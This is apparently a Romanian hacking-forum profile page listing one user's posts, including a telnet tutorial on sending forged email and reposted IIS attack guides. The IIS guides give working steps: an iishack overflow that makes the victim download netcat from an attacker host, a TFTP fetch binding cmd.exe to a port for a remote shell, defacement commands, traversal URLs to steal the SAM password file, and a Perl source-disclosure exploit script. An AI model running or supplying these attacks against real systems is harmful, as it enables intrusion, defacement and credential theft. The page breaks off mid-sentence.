Jump to content

BizZaroO

Active Members
  • Posts

    195
  • Joined

  • Last visited

Reputation

27 Excellent

About BizZaroO

  • Rank
    Registered user
    Newbie

Converted

  • Location
    Satul cu blocuri si strazi Plopeni city

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Nimeni?? come on... va rog... un raspuns aici
  2. Salut! Intrebare... Stie cineva linkul asta: https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa/wa/validateAppleID?appleid=... era valabil intr-un timp, acum nu mai e... Aveti idee in ce s-a schimbat si cum pot sa gasesc acum daca o adresa de email este alocata unui apple id? Multumiri in avans, BizZaroO
  3. academic-blog.tk Atentiune! Acest blog contine cultura la un nivel riscant. Daca apar manifestari placute adresati`va adminului blogului. Recrutez Autori!! Daca iti place sa scri si sti sa te exprimi intr`un mod cat mai artistic si inteligent atunci poti avea propria ta categorie pe blog. pentru mai multe detalii trimite un mail cu un articol de`al tau (fara fisiere atasate) si daca imi place cum scrii vei avea propria ta categorie unde iti vei putea spune in pace parerea despre orice!!
  4. BizZaroO a revenit sper ca a mai crescut rst de la ultima mea vizita... Ras vad ca inca mai esti pe aici bv...
  5. Deci sa lamuresc situatia... 1. tutorialul nu e facut de mine... eu nu fac tutoriale pentru ca nu am talent sa explic 2. nu e copy si paste pentru ca il am de mult timp in calculator... si inca mai am multe tutoriale L.e : SIGKILL01 nu cred ca sti nici pe jumatate din cat stiu io... u o sa ai drepul sa ma jugnesti cand o sa ai ceva vechime si o sa pui si tu neste programe si neste chesti care sa ajute lumea
  6. iti zic eu ca ai scris tu netstat -n in run... daca scriai in cmd nu iti iesea! pare rau ras dar in cmd am scris ma rog... oricum am rezolvat problema
  7. TELNET Ce insemana telnet? Telnet ccs(cunoscut ca s) emulator terminal, este o consola care da voie unui user sa foloseasca resursele altui sistem, conectandu-se folosing adresa de IP. Desigur, telnet este ca un Trojan, atasandu-se de server sau ca serverul. Folosind clientul telnet un utilizator se conecteaza la un server telnet pe un port specific. Portul specific pentru Telnet este 23. As putea spune ca telnet este cel mai bun instrument pentru hackeri. Totzi hackerii mari il folosesc pentru exploaterea sistemelor loophole. Poti rula telnet intrand in Run si scriind telnet, apoi apasand enter. In general la Win 9x/Me va aparea direct, dar la WinXP sau 2000, va aparea in Dos. Pentru a rula telnet in Windows 95/98/M, doar deschideti un fisier in Notepand.exe in care scrieti urmatoarele: REGEDIT 4 [HKEY_USERSS-1-5-21-1229272821-1563985344-1060284298 1003SoftwareMicrosoftTelnet]"MODE"="CONSOLE" Salveaza fisierul sub numele de vreau_sa_fiu_un_mare_hacker.reg, si ruleaza-l. Or simple run Ms-Dos or Command(XP) si scrie telnet, apoi scrieti "?/help" pentru a vizualiza o lista de comenzi. Ce as putea face cu telnet? De obicei hackerii se conecteaza la sistemul telnet, format din Host si Port, incercand sa intre in root. Mai intai va trebuie un Port Scan f.bun care sa scaneze toate porturile dintr-un sistem, introduceti de exemplu stefanx.ro si scanati portul 25. Dupa care conectativa la acel port folosind telnet. De exemplu am scanat serverul de web al unui prieten, care din intamplare este un mare web developer si am descoperit ca are portul 25 dealungul unui daemon SMTP ruland in el. Deci folosind telnet, m-am conectat la serverul lui, pe portul 25 folosind clientul SMTP, am trimis cateva mailuri anonime la cativa prieteni... exemplu: c:telnet Welcome to Microsoft Telnet Client Escape Character is 'CTRL+]' Microsoft Telnet> open sharka.ro 25 Connecting to stefanx.ro.... Connected.. . . . acum serviciul SMTP este al meu.. Doar m-am jucat putin... daca nu stii comenzile telnet, scrie 'HELP' pentru win9x sau '?/HELP' pentru winXP. -Nota: La SMTP, portul specific este 25. Acum va voi arata cum sa trimiteti un mail fals prin protocolul ESMTP(Extended Simple Mail Transfer Protocol): Telnet>open stefanx.ro 25 Connecting.... Connected to stefanx.ro 220 Welcome to stefanx.ro ESMTP service 8.9.3 HELO Stefan 220 Welcome to sendmail Stefan MAIL E-mail 240 Sender set to E-mail RCPT E-mail 240 Recipient set to E-mail DATA 220 End with "." Subject : Salut pizza! Stii ce, trimit maiuri false prin SMTP-ul tau, nu te supara. . 240 CA55910 Message accepted for delivery.. Gandeste-te ce inseamna valorile 240 si 220 si CA55910.. . Valorile 240 si 220 sunt codurile mesajelor trimise de catre server. De exemplu serverul va raspunde cu valoarea 220 pentru a arata o poza...vei vedea toate pozele care au venit odata cu 220... In legatura cu CA55910... este MSGID sau Message ID... in server, fiecare mesaj trimis sau primit are o identificare, acest mesaj are CA55910, cum ar fi IP-ul tau, politia te va identifica dupa IP.L:o)L. De aceea o sa incer sa scriu o lectie despre spoofing, ce inseamna cum sa iti ascunzi IP-ul. Note: This is my earnest request to each and everybody who reads this manual.. please do not send any fake mail at E-mail and please do not use the service at anisurrahman.net He is a very good friend of mine.. I have learnt many things regarding web designing and web programming from him.. RETINE: Uneori nu te poti conecta la unele servere...de ce? Nici eu nu stiu, poate acestea au firewall, sau poate din cauza ca nu am eu destula cunostiinta. Yes !!! Am trimis un mail fals !!! Sunt hacker !!! OK !!! Ca ai trimis un mail fals nu inseamna ca esti hacker. Nu are de-a face cu hacking. Mail-urile false pot fi detectate cu usurinta, la fel ca si ISP-ul, si iti poti pierde contul la ISP. Apoi, daca victima trimite un e-mail catre E-mail si se plange de activitatea ta, atunci imi pare rau, iti pierzi contul la ISP. Oricum, incearca sa iti trimiti mail-uri false singur, incercand sa te obisnuiesti cu telnet. Nu te bucura si nu incepe sa hackuiesti cu telnet, ca nu e asa de usor cum pare. Mi-am facut singur serviciul de SMTP sharka.ro, si inca nu am putut sa iau root de la el. Desigur sunt mult mai multe pe care le poti folosi prin telnet. De exemplu poti incepe cu IRC(internet relay chat). Sunt sigur ca il cunoasteti toti. Se poate folosi mIRC-ul, dar nu poate face foarte de multe... Acum cred ca este vreamea sa va arat cum functioneaza un server de IRC si/sau mIRC. Pentru a incepe sesiunea, programul trebuie conectat la un server de IRC. Porturi specifice sun 6667, 6668, 7000 etc. in mIRC cand vrei sa te conectezi la un server, portul este de-obicei 6667. Scrie: /sever geneva.ch.eu.undernet.org 8000 in fereastra mIRC. Daca nu pui nici un port, programul il va lua drept 6667. Aceasta comanda te va conecta la serverul geneva.ch.eu.undernet.org apoi scriind /join #canal vei intra pe un canal, incepand sesiunea Tip : Pentru a vedea IP-ul unui user, este simplu... Scrie doar: /whois nick in fereastra canalului. Daca sunteti la un icafe, puteti accesa cu usurinta hardul calculatorului, care de obicei este protejat de catre un icafe manager, scriind comanda /run c: . Acum cred ca cunoasteti chestiile de baza din mIRC. Acum sa ajungem la punct, incepand o sesiune IRC cu telnet. In general foarte multe programe warfare(warez), sunt facute pentru flood, ceea ce insemna sa inunzi cu acelasi mesaj, cauzand ca cei conectati sa nu mai poata vb intre ei, iar ceilalti sa nu se mai poate conecta. Dar te poate detecta cu usurinta, dupa nick, afland-uti IP-ul. Programele facute de mine se conecteaza fara nick, aflandu-se o pauza(loc liber) pe lista cu clienti din canal, deci mesajul este trimis de catre nimeni ,iar eu fiind acea pauza, dar si asa... Acum sa incepem... conectarea telnet la un server IRC pe portul 6667 Telnet>open brussels.be.eu.undernet.org 6667 <vei vedea niste mesaje in acest timp> nick <crystygye> <alte gunoaie de la server> user <crystygye 127.0.0.1 localhost :HC> <acum vei vedea o gramada de mesaje de la server> retine: sa nu scrii si semnele <>... eu le-am folosit ca sa nu incurc mesajele cu altele. acum esti conectat la server de mIRC, poti folosi comenzile de mIRC, dar fara ascrie un mesaj privat: PRIVMSG NICK MESSAGE : <Salut draga... Iti arde de-o discutie? Sau da bula?> "sau da bula" am scris intentionat(da = de). Acum cu siguranta stiti cate ceva despre telnet. Cu telnet poti accesa si/sau controla un calculator conectat la internet (Remote Computer). Ideea de conectare prin telnet De obicei telnet este folosit pentru conectarea la un server particular. De obicei hackerii il folosesc pentru a avea root la acel sistem. Daca crezi ca te poti conecta la SMTP-ul ISP-ului tau si vei avea root la ISP'ul tau, atunci uita de toate astea. In primul rand hackerii scaneaza porturile intr-o anumita tinta(IP, sau numele serverului), pentru a gasi porturile deschise. Tip: Puteti folosi "Front Ambush". Este un port scanner foarte rapid. Il puteti downloada de pe pagina de internet a Ingerului Negru - http://www.seinfeld.go.ro Dar daca ISP-ul tau te prinde ca le scanezi porturile, atunci nu te supara pe mine. Acum sa zicem ca ai gasit un server ftp cu portul 23. Tot ce trebuie sa faci este sa te conectezi cu telnet la port. Dar lucrurile nu pot sta asa de usor... majoritatea serverelor de ftp (aprox. 98%) iti dau acces doar cerand user si parola valide, deci trebuie sa ai un cont ca sa te poti conecta cu user-ul si parola ta la contul tau... sau la contul altora daca ai si parola. Tip: Pentru a nu fi prins, sa stie si de IP Spoofing. Folosit pentru ascuderea IP-ului, voi face un manual complet si despre asta, il puteti lua de pe aceeasi pagina.(http://www.seinfeld.go.ro)(http://www.dd-hacking.go.ro)
  8. Consider ca pentru a fi cu adevarat un "hacker" trebuie intai sa sti sa iti folosesti "armele" care le ai la indemana... cea mai buna "arma este" cmd TUTORIALUL NU ESTE FACUT DE MINE Dat fiind faptul ca nu este pus un astfel de tutorial ... Uite cum sta treaba...daca stii sa umblii cu adevarat bine in command prompt,chiar nu ai nevoie de alte programe k sa fii un "hacker".Majoritatea utilizatorilor de Windows nu stiu cu adevarat ce arma puternica au instalata pe pc-ul lor si traiesc cu ideea k linuxu este cu mult superior win la partea de hacking.Ei bine o sa va demonstrez k nu e asa.O sa incepem cu unele comenzi usoare cum ar fii: -aflarea ip-ului celor de pe mess: k sa aflii ip-u trebuie doar sa intrii in START>RUN si sa tastezi comanda "cmd".Dupa ce apare fereastra de la Command Prompt scrii "netstat -an" si nu degeaba v-am tinut eu lectia cu porturile,acum e folositoare pt k dupa ce tastezi "netstat -an" iti apar o serie de ip-uri la care pc-ul tau s-a conectat.Si cum yahoo messenger foloseste de obicei portu 5101 ... ip-urile pe care vrei sa le aflii au portu 5101 -aflarea ip-ului unui server,site: pt asta tastezi comanda "tracert si site-u la care vrei sa aflii ip" EX: tracert www.yahoo.com Bine k acu pot eu sa stau 2 ani sa va scriu aici tot ce stiu despre cmd si tot nu termin,am sa va dau in schimb lista comenzilor (nu toate) din cmd si ramane sa exersati si voi. ADDUSERS Add or list users to/from a CSV file ARP Address Resolution Protocol ASSOC Change file extension associations ASSOCIAT One step file association AT Schedule a command to run at a later time ATTRIB Change file attributes BROWSTAT Get domain, browser and PDC info CACLS Change file permissions CALL Call one batch program from another CD Change Directory - move to a specific Folder CHANGE Change Terminal Server Session properties CHKDSK Check Disk - check and repair disk problems CHKNTFS Check the NTFS file system CHOICE Accept keyboard input to a batch file CIPHER Encrypt or Decrypt files/folders CleanMgr Automated cleanup of Temp files, recycle bin CLEARMEM Clear memory leaks CLIP Copy STDIN to the Windows clipboard. CLS Clear the screen CLUSTER Windows Clustering CMD Start a new CMD shell COLOR Change colours of the CMD window COMP Compare the contents of two files or sets of files COMPACT Compress files or folders on an NTFS partition COMPRESS Compress individual files on an NTFS partition CON2PRT Connect or disconnect a Printer CONVERT Convert a FAT drive to NTFS. COPY Copy one or more files to another location CSVDE Import or Export Active Directory data DATE Display or set the date Dcomcnfg DCOM Configuration Utility DEFRAG Defragment hard drive DEL Delete one or more files DELPROF Delete NT user profiles DELTREE Delete a folder and all subfolders DevCon Device Manager Command Line Utility DIR Display a list of files and folders DIRUSE Display disk usage DISKCOMP Compare the contents of two floppy disks DISKCOPY Copy the contents of one floppy disk to another DNSSTAT DNS Statistics DOSKEY Edit command line, recall commands, and create macros DSADD Add user (computer, group..) to active directoryDSQUERY List items in active directory DSMOD Modify user (computer, group..) in active directory ECHO Display message on screen ENDLOCAL End localisation of environment changes in a batch file ERASE Delete one or more files EXIT Quit the CMD shell EXPAND Uncompress files EXTRACT Uncompress CAB files FC Compare two files FDISK Disk Format and partition FIND Search for a text string in a file FINDSTR Search for strings in files FOR Conditionally perform a command several times FORFILES Batch process multiple files FORMAT Format a disk FREEDISK Check free disk space (in bytes) FSUTIL File and Volume utilities FTP File Transfer Protocol FTYPE Display or modify file types used in file extension associations GLOBAL Display membership of global groups GOTO Direct a batch program to jump to a labelled line HELP Online Help HFNETCHK Network Security Hotfix Checker IF Conditionally perform a command IFMEMBER Is the current user in an NT Workgroup INSTSRV Install an NT Service IPCONFIG Configure IP KILL Remove a program from memory LABEL Edit a disk label LOCAL Display membership of local groups LOGEVENT Write text to the NT event viewer. LOGOFF Log a user off LOGTIME Log the date and time in a file MAPISEND Send email from the command line MEM Display memory usage MD Create new folders MODE Configure a system device MORE Display output, one screen at a time MOUNTVOL Manage a volume mount point MOVE Move files from one folder to another MOVEUSER Move a user from one domain to another MSG Send a message MSIEXEC Microsoft Windows Installer MSINFO Windows NT diagnostics MSTSC Terminal Server Connection (Remote Desktop Protocol) MUNGE Find and Replace text within file(s) MV Copy in-use files NET Manage network resources NETDOM Domain Manager NETSH Configure network protocols NETSVC Command-line Service Controller NBTSTAT Display networking statistics (NetBIOS over TCP/IP) NETSTAT Display networking statistics (TCP/IP) NOW Display the current Date and Time NSLOOKUP Name server lookup NTBACKUP Backup folders to tape NTRIGHTS Edit user account rights PATH Display or set a search path for executable files PATHPING Trace route plus network latency and packet loss PAUSE Suspend processing of a batch file and display a message PERMS Show permissions for a user PERFMON Performance Monitor PING Test a network connection POPD Restore the previous value of the current directory saved by PUSHD PORTQRY Display the status of ports and services PRINT Print a text file PRNCNFG Display, configure or rename a printer PRNMNGR Add, delete, list printers set the default printer PROMPT Change the command prompt PUSHD Save and then change the current directory QGREP Search file(s) for lines that match a given pattern. RASDIAL Manage RAS connections RASPHONE Manage RAS connections RECOVER Recover a damaged file from a defective disk. REG Read, Set or Delete registry keys and values REGEDIT Import or export registry settings REGSVR32 Register or unregister a DLL REGINI Change Registry Permissions REM Record comments (remarks) in a batch file REN Rename a file or files. REPLACE Replace or update one file with another RD Delete folder(s) RDISK Create a Recovery Disk RMTSHARE Share a folder or a printer ROBOCOPY Robust File and Folder Copy ROUTE Manipulate network routing tables RUNAS Execute a program under a different user account RUNDLL32 Run a DLL command (add/remove print connections) SC Service Control SCHTASKS Create or Edit Scheduled Tasks SCLIST Display NT Services ScriptIt Control GUI applications SET Display, set, or remove environment variables SETLOCAL Begin localisation of environment changes in a batch file SETX Set environment variables permanently SHARE List or edit a file share or print share SHIFT Shift the position of replaceable parameters in a batch file SHORTCUT Create a windows shortcut (.LNK file) SHOWGRPS List the NT Workgroups a user has joined SHOWMBRS List the Users who are members of a Workgroup SHUTDOWN Shutdown the computer SLEEP Wait for x seconds SOON Schedule a command to run in the near future SORT Sort input START Start a separate window to run a specified program or command SU Switch User SUBINACL Edit file and folder Permissions, Ownership and Domain SUBST Associate a path with a drive letter TASKLIST List running applications and services TIME Display or set the system time TIMEOUT Delay processing of a batch file TITLE Set the window title for a CMD.EXE session TOUCH Change file timestamps TRACERT Trace route to a remote host TREE Graphical display of folder structure TYPE Display the contents of a text file USRSTAT List domain usernames and last login VER Display version information VERIFY Verify that files have been saved VOL Display a disk label WHERE Locate and display files in a directory tree WHOAMI Output the current UserName and domain WINDIFF Compare the contents of two files or sets of files WINMSD Windows system diagnostics WINMSDP Windows system diagnostics IIWMIC WMI Commands XCACLS Change file permissions XCOPY Copy files and folders incercati sa va obijunuiti cu aceste comenzi si sa le intelegeti pe fiecare in parte.
  9. yonyx16 Il trimiteti cuiva ( pe mess ) si in timp ce se trimite serverul intrati in CMD si scrieti : "netstat -n" si dati enter . Asa veti afla IP victimei ( are portul 5101 , o sa gasiti ) ma fi atent explica-mi ceva... am scris netstat -n iesea imediat din el am scris netstat simplu sta putin arata neste ip si porma iese deci???
  10. mie imi zice ca lipseste Mswinsck.ocx desi e akolo
  11. Hacking IIS Tutorial deface : frontpage : rds : main The Internet Information Server Attack - Remote buffer overflow exploit. By r00tsec from Security Espionage Community. Revised 03/16/00. This site is also available in plain text. Forewords: This text goes out to all those NT hackers out there. It is based on the info I have from eEye Digital Security Team, which found the exploit, and my own experience. Note: All the files used in this paper can be found at the main page. According to eEye Digital Security Team the systems affected include: Internet Information Server 4.0 (IIS4) Microsoft Windows NT 4.0 SP3 Option Pack 4 Microsoft Windows NT 4.0 SP4 Option Pack 4 Microsoft Windows NT 4.0 SP5 Option Pack 4 I performed the attack from a Windows NT 4.0 machine with the required programs: iishack.exe ncx.exe or ncx99.exe or BertzSvc.exe Ncx.exe is a hacked up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its argument, which means that it binds cmd.exe to port 80. The eEye people has received some reports from people not being able use the ncx.exe, so they have made another hacked up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason of why ncx.exe doesn't work sometimes is that inetinfo.exe has to be exited, before it can work. Ncx.exe fits under the description Trojan horse! To kick inetinfo.exe use avoid.exe (which also soon will be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead. How to do it: First of all you'll need a server running IIS4, NT4 and/or SP3/4/5 + OP4. To find such, go to www.netcraft.com or you favorite “what's-this-site-running-search-engine” and find a victim running the affected system.Second, you need to craft a buffer overrun about 3 k on the target machine! Then launch iishack.exe via the command prompt in WinNT. Output: --------(IIS 4.0 remote buffer overflow exploit)---------- © dark spyrit -- barns@eeye.com. http://www.eEye.com [usage: iishack <host> <port> <url> ] eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe do not include 'http://' before hosts! ---------------------------------------------------------- Then issue the command as you can see beneath ex. C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe Output (if successful): Data sent! note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes. After that type telnet www.victim.com 80 in cmd.exe or in the start/run menu. Output: Microsoft® Windows NT © Copyright 1985-1996 Microsoft Corp. C:\> Voila! Access granted! Do you whatever you wanna do, but remember to: - add a scheduled task to restart inetinfo.exe in X minutes. (AT command will do it) - add a scheduled task to delete ncx.exe X-1 minutes. - clean the log files (if there are any). Corrections, suggestions or comments are accepted here --------------------------------------------------------------- Hi Folks, i have just compiled the well-known IIS tricks. I hope it will be helpful for securing your server. any comment,suggestion or insult...? wellcome MAB- SECURING IIS by BREAKING ===================================================== by Mount Ararat Blossom 9/15/2000 mount_ararat_blossom@hotmail.com ===================================================== 01- Abstract I am not sure what you want to get out of this but basically this paper is intended on breaking merely IIS web servers especially versions 4.0 and 5.0 via TCP/IP over the port 80. This techniques works against even so-called secure networks just because every network even those secured ones lets HTTP connections in. ===================================================== 02- Intro Alright so you all wanna know how to break into IIS web servers? First off, you should find a cgi-scanner so that things will get easier. My personnel preferences are "whisker" by "rain forest puppy" (www.wiretrip.net/rfp). "cis" by "mnemonix" (www.cerberus-infosec.co.uk) To understand which server is running on the victim site telnet <victim> 80 GET HEAD / HTTP/1.0 and there you go with the name and the version of the web server. However some sites might run their web servers over 8080, 81, 8000, 8001, and so on. To understand SSL web servers, which provides encryption between the web server and the browser we use the tool "ssleay" s_client -connect <victim>:443 HEAD / HTTP /1.0 and here we go again. As i am writing this i am hoping that you will be able to use this to secure your web servers instead of using this to break into others. ===================================================== 03- Game Starts ========IIS HACK===== The folks at www.eeye.com, have found a vulnerability on IIS 4.0 which allows us to upload a crafted version of netcat (hacker's swiss army knife) onto victim server and binds a cmd.exe on port 80. The vulnerabliy was a bufferoverflow in .htr .idc and .stm files. The problem is with insufficient bounds checking of the names in the URL for .htr .stm and .idc files, allowing hackers to insert some backdoors to download and execute arbitrary commands on the local system as the administrator user. To hack the victim site we need iishack.exe ncx.exe (you can find these two at www.technotronic.com) plus we need a web server running at our attacking box. First off, run the web server on your attacking box and place the ncx.exe on your root directory. then run iishack.exe against the victim site c:\>iishack.exe <victim> 80 <evil_hacker>/ncx.exe Then here we go, go and get your swiss army knife, namely netcat, c:\>nc <victim> 80 ==============>>>BOOM! the command promt from the victim site suddenly appears on your box !!! D:\> or whatever it is , C;E;... do you want me to xplain what to do next, hey common you must be kidding ...hehe.... =========MDAC- Local Command Execution=========== You might think that it is a years-old vulnerability, however what i see on pen-tests is that almost 40% of IIS web servers are still vulnerable to this. IIS' MDAC component has a vulnerability where an attacker can submit commands for local execution. The core problem is with the RDS Datafactory. By default, it allows remote commands to be sent to the IIS server. The commands will be run as the effective user of the service, which is typically the SYSTEM user. I wont get into details, if you want go and check RFP's web site. However, you can find a vulnerable site by checking c:\>nc -nw -w 2 <victim> 80 GET /msadc/msadcs.dll HTTP and if you get the following application/x_varg it is most probably vulnerable if not patched. You can find the exploit, mdac.pl and msadc2.pl from rain forest puppy's web site at www.wiretrip.net/rfp It checks for the vulnerability and if it is vulnerable then it asks for the command you wanna execute: c:\> mdac.pl -h <victim> Please type the NT commandline you want to run (cmd /c assumed):\n cmd /c if you wanna change the web site which is located at d:\inetpub\wwwroot\victimweb\index.htm then you can type: cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm or what ever you want but my personnal preference is uploading our swiss army knife, netcat, and binding it to the cmd.exe to the port 80. To do that i set up my TFTP server and put nc.exe in it. Then when i am asked to type the command i want to execute, i type the following: cmd/c cd %systemroot%&&tftp -i <evil_hacker> GET nc.exe&&del ftptmp && attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe there you go, go on fire your netcat against the victim over port 80, you get the eggshell, cmd.exe..... =========Codebrws.asp & Showcode.asp ================== Codebrws.asp and Showcode.asp is a viewer file that ships with Microsoft IIS, but is not installed by default. The viewer is intended to be installed by the administrator to allow for the viewing of sample files as a learning exercise; however, the viewer does not restrict what files can be accessed. A remote attacker can exploit this vulnerability to view the contents of any file on the victim's server. However, there are several issues to be aware of: 1. Codebrws.asp and showcode.asp are not installed by default. 2. The vulnerability only allows for viewing of files. 3. The vulnerability does not bypass WindowsNT Access Control Lists (ACLs). 4. Only files in the same disk partition can be viewed. 5. Attackers must know the location of the requested file. Lets say you wanna see the code of codebrws.asp request the following from the from your favorite web browser, http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/ iisamples/exair/howitworks/codebrws.asp then you will see the source code of codebrws.asp For using showcode.asp, do the following again from your infamous browser http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/repair/sam._ There you go, you get the infamous sam._ file, copy it, expand it and crack it using Lophtcrack, my personal choise, and you will get all user passwords even the administrator one. =========Null.htw=============== Microsoft IIS running with Index Server contains a vulnerability through Null.htw even if no .htw files exist on the server. Thevulnerability displays the source code of an ASP page or otherrequested file. The ability to view ASP pages could provide sensitive information such as usernames and passwords. An attacker providing IIS with a malformed URL request could escape the virtual directory, providing access to the logical drive and root directory. The "hit-highlighting" function in the Index Server does not adequately restrain what types of files may be requested, allowing an attacker to request any file on the server. Microsoft has released a patch for Windows 2000 addressing this vulnerability. Null.htw function has 3 variables which gets their inputs from the user. These variables are as follows CiWebhitsfile CiRestriction CiHiliteType Respectively. Say that, we wanna see the source code of default.asp, the type the following from your favorite browser http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full and you will get the source of default.asp file. ========webhits.dll & .htw================ The hit-highligting functionality provided by Index Server allows a web user to have a document with their original search terms highlighted on the page. The name of the document is passed to .htw file with the CiWebhitsfile argument. Webhits.dll, the ISAPI Application that deals with the request, opens the file highlights accordingly and returns the resulting page. As the user has control of the CiWebhitsfile argument passed to the .htw file they can request anything they want. And the real problem is that, they can view the source of ASP and other scripted pages. To unserstand you are vulnerable, request the following from the site http://www.victim.com/nosuchfile.htw if you get the following from the server format of the QUERY_STRING is invalid it means that you are vulnerable. The problem is because of webhits.dll (an ISAPI Application) associated to .htw files. You can find the .htw files in the following locations of infamous IIS web server, /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /isssamples/exair/search/qfullhit.htw /isssamples/exair/search/qsumrhit.htw /isshelp/iss/misc/iirturnh.htw (this is normally for loopback) An attacker, for instance view the contents of sam._ file as follows http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none&cihilitetype=full will reveal the contents of sam._ file, which is binary, you should copy it, expand it and crack it as i explained several times before. ===ASP Alternate Data Streams(::$DATA)================== The $DATA vulnerability, published in mid-1998, results from an error in the way the Internet Information Server parses file names. $DATA is an attribute of the main data stream (which holds the "primary content") stored within a file on NT File System (NTFS). By creating a specially constructed URL, it is possible to use IIS to access this data stream from a browser. Doing so will display the code of the file containing that data stream and any data that file holds. This method can be used to display a script-mapped file that can normally be acted upon only by a particular Application Mapping. The contents of these files are not ordinarily available to users. However, in order to display the file, the file must reside on the NTFS partition and must have ACLs set to allow at least read access; the unauthorized user must also know the file name. Microsoft Windows NT Server's IIS versions 1.0, 2.0, 3.0 and 4.0 are affected by this vulnerability. Microsoft has produced a hotfix for IIS versions 3.0 and 4.0. The fix involves IIS "supporting NTFS alternate data streams by asking Windows NT to make the file name canonical" according the Microsoft. To view or get the source of an .asp code, type the following from your browser http://www.victim.com/default.asp::$DATA and you will get the source code. =========ASP Dot Bug==================== The famous Lopht group has discovered the ASP dot bug in 1997. The vulnerability involved being able to reveal ASP source code to attackers. By appending one or more dots to the end of an ASP URL under IIS 3.0, it was possible to view the ASP source code. The exploit worked by appending a dot the end of an ASP as follows http://www.victim.com/sample.asp. ======ISM.DLL Buffer Truncation=============== This bug was found by Cerberus Information Security team. It runs on IIS 4.0 and 5.0. that allows attackers to view the content of files and source code of scripts. By making a specially formed request to IIS, with the name of the file and then appending around 230 + “ %20 “ (these represents spaces) and then appending “ .htr ” this tricks IIS into thinking that the client is requesting a “ .htr “ file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr rsources to this DLL. ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file we want to get source of. The contents are then returned. This attack can only be launched once though., unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory. An attacker can view the source of global.asa, for instance, as follows http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr will reveal the source of global.asa ==========.idc & .ida Bugs======================= This exploit, actually, similar to ASP dot bug, however this time we get the path of web directory on IIS 4.0. I have even seen this bug working on IIS 5.0 on my pen-tests. By adding an “.idc” or “.ida” extension to the end of URL will cause IIS installations to try to run the so-called .IDC through the database connector .DLL. If the .idc doesnt exists, than it will return rather informative about the server. http://www.victim.com/anything.idc or anything.idq you will get the path. ============+.htr Bug=========================== This exploit is also ever so similar to dot asp bug and you can get the source code of ASA and ASP files by appending a +.htr to the URL of asp and asa files. http://www.victim.com/global.asa+.htr you may get the source code to browse ===========NT Site Server Adsamples Vulnerability ====== By requesting site.csc, which is normally located in /adsamples/config/site.csc, The attacker may be able to retrieve the DSN, UID and PASS of the database as this file may contain them. By typing the following http://www.victim.com/adsamples/config/site.csc the attacker will download the file site.csc and (s)he can get some important data. ==========Password Attack to User Accounts=========== IIS 4.0 has an interesting feature that can allow a remote attacker to attack user accoounts local to the web server as well as other machines across to the internet. Added to this if your Web server is behind a firewall performing NAT (network address translation), machines on inside could be attacked as well. By default every install of IIS 4.0 creates a virtual directory “ /iisadmpwd “. This directory contains a number of .htr files. Anonymous users are allowed to access this files, they are not restricted to loopback address(127.0.0.1). The following is a list of files found in the .iisadmpwd directory, which physically maps to c:\winnt\system32\inetsrv\iisadmpwd Achg.htr Aexp.htr Aexp2.htr Aexp2b.htr Aexp3.htr Aexp4.htr Aexp4b.htr Anot.htr Anot3.htr This files are pretty much of the same variants of the same file and allow a user to change their password via web. It can also be used to enumerate valid accounts through guess work. If the user account does not exist, a message will be returned saying “invalid domain”. If the account exists, but the password is wrong then the message will say so. If an IP address followed by a backslash precedes the account name then the IIS server will contact the remote machine, over the NetBIOS session port 139, and attempt to change to user’s password. (x.x.x.x\ACCOUNTNAME) Therefore, if you do not need this service, remove the /iisadmpwd directory. This will prevent attackers. =============Translate:f Bug ==================== Daniel Docekal brought this issue in BugTraq this summer, August 15, 2000. (www.securityfocus.com/bid/1578) The actual problem is with the WebDAV implementation in office 2000 and FrontPage 2000 Server Extensions. When someone makes a request for ASP/ASA or anyother scriptable page and adds “translate:f “ into headers of HTTP GET (headers are not part of URL, part of HTTP request), then they are come up with complete ASP/ASA source code on Win2K SP1 not installed. Translate:F is a legitimate header for WebDAV and is used in WebDAV compatible client and in FP2000 to get the file for editing. Simple adding of “translate:f” and placing “/” at the end of request to HTTP GET will lead in security bug. It is a Win2K bug, but due to FP2000 installed IIS4.00, it is also a IIS4.0 bug. You can use the following perl script to use this exploit. ############################# use IO::Socket; # my ($port, $sock,$server); # $size=0; # ############################# # $server="$ARGV[0]"; $s="$server"; $port="80"; $cm="$ARGV[1]"; &connect; sub connect { if ($#ARGV < 1) { howto(); exit; } $ver="GET /$cm%5C HTTP/1.0 Host: $server Accept: */* Translate: f \n\n"; my($iaddr,$paddr,$proto); $iaddr = inet_aton($server) || die "Error: $!"; $paddr = sockaddr_in($port, $iaddr) || die "Error: $!"; $proto = getprotobyname('tcp') || die "Error: $!"; socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!"; connect(SOCK, $paddr) || die "Error: $!"; send(SOCK, $ver, 0) || die "Can't to send packet: $!"; open(OUT, ">$server.txt"); print "Dumping $cm to $server.txt \n"; while(<SOCK>) { print OUT <SOCK>; } sub howto { print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n"; } close OUT; $n=0; $type=2; close(SOCK); exit(1); } If we call the script as translate.pl then we can get a ASA/ASP source code as follows Trasn.pl www.victim.com codetoview.asp And there you go, you get the source code of codeview.asp. 04- Conclusion All the information i have given you has been widely used in wild. However what i tried to do was just to collect all these information together as to check the security of our famous IIS 4.0 and 5.0. Wheneveri encounter a IIS web server during my pen-tests, i 